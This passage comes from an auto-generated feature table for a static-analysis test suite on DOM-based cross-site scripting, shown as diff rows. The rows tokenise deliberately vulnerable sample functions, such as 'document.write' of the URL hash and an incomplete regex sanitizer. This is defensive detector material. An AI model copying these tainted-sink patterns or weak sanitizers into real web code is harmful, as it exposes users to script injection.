element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:16 | document.write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:16 | document.write | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:16 | document.write | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:16 | document.write | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:52 | documen ... #')[1]) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:52 | documen ... #')[1]) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:52 | documen ... #')[1]) | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:52 | documen ... #')[1]) | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:52 | documen ... #')[1]) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:52 | exceptional return of documen ... #')[1]) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:52 | exceptional return of documen ... #')[1]) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:52 | exceptional return of documen ... #')[1]) | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:52 | exceptional return of documen ... #')[1]) | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:424:3:424:52 | exceptional return of documen ... #')[1]) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:424:12:424:16 | write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:424:12:424:16 | write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:424:12:424:16 | write | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:424:12:424:16 | write | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:424:12:424:16 | write | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:23 | window | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:23 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:23 | window | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:23 | window | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:23 | window | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:32 | window.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:32 | window.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:32 | window.location | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:32 | window.location | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:32 | window.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:37 | window.location.hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:37 | window.location.hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:37 | window.location.hash | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:37 | window.location.hash | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:37 | window.location.hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:43 | window. ... h.split | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:43 | window. ... h.split | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:43 | window. ... h.split | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:43 | window. ... h.split | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:43 | window. ... h.split | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:48 | exceptional return of window. ... it('#') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:48 | exceptional return of window. ... it('#') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:48 | exceptional return of window. ... it('#') | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:48 | exceptional return of window. ... it('#') | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:48 | exceptional return of window. ... it('#') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:48 | window. ... it('#') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:48 | window. ... it('#') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:48 | window. ... it('#') | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:48 | window. ... it('#') | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:424:18:424:48 | window. ... it('#') | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:424:18:424:51 | window. ... '#')[1] | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/tst.js:424:18:424:51 | window. ... '#')[1] | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:424:18:424:51 | window. ... '#')[1] | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17558,6 +122151,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:424:18:424:51 | window. ... '#')[1] | enclosingFunctionName | hash2 | | autogenerated/Xss/DomBasedXss/tst.js:424:18:424:51 | window. ... '#')[1] | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:424:18:424:51 | window. ... '#')[1] | receiverName | document | +| autogenerated/Xss/DomBasedXss/tst.js:424:25:424:32 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:424:25:424:32 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:424:25:424:32 | location | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:424:25:424:32 | location | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:424:25:424:32 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:424:34:424:37 | hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:424:34:424:37 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:424:34:424:37 | hash | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:424:34:424:37 | hash | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:424:34:424:37 | hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:424:39:424:43 | split | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:424:39:424:43 | split | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:424:39:424:43 | split | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:424:39:424:43 | split | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:424:39:424:43 | split | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:424:45:424:47 | '#' | CalleeFlexibleAccessPath | window.location.hash.split | | autogenerated/Xss/DomBasedXss/tst.js:424:45:424:47 | '#' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:424:45:424:47 | '#' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17565,6 +122173,107 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:424:45:424:47 | '#' | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | | autogenerated/Xss/DomBasedXss/tst.js:424:45:424:47 | '#' | enclosingFunctionName | hash2 | | autogenerated/Xss/DomBasedXss/tst.js:424:45:424:47 | '#' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:424:50:424:50 | 1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:424:50:424:50 | 1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:424:50:424:50 | 1 | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:424:50:424:50 | 1 | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:424:50:424:50 | 1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:427:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:427:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:427:0 | this | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:427:0 | this | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:427:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | 'arguments' object of function nonGlobalSanitizer | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | 'arguments' object of function nonGlobalSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | 'arguments' object of function nonGlobalSanitizer | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | 'arguments' object of function nonGlobalSanitizer | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | 'arguments' object of function nonGlobalSanitizer | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | exceptional return of function nonGlobalSanitizer | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | exceptional return of function nonGlobalSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | exceptional return of function nonGlobalSanitizer | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | exceptional return of function nonGlobalSanitizer | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | exceptional return of function nonGlobalSanitizer | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | functio ... // OK\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | functio ... // OK\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | return of function nonGlobalSanitizer | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | return of function nonGlobalSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | return of function nonGlobalSanitizer | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | return of function nonGlobalSanitizer | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:427:1:433:1 | return of function nonGlobalSanitizer | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:427:10:427:27 | nonGlobalSanitizer | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:427:10:427:27 | nonGlobalSanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:427:10:427:27 | nonGlobalSanitizer | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:428:7:428:12 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| 